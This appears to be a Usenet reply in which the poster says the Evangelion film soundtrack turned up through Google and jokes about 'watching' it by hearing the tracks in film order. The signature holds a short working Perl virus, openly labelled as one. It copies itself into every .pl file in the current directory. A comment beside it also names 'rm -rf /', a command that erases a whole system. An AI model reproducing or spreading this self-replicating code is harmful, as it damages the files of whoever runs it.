Scripsit illa aut ille luci <>:
> i can$(D??(Bt find end of eva soundrack,HELP MEEEEEEE.....

Just watch the movie and think the voices aren't there...

Seriously: I just found it using Google.

I can "watch" the soundtrack, ie hear it and know what happens when.
But that's not too difficult when the soundtrack is "chronologically",
ie the tracks appear in the same order as in the movie.

#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
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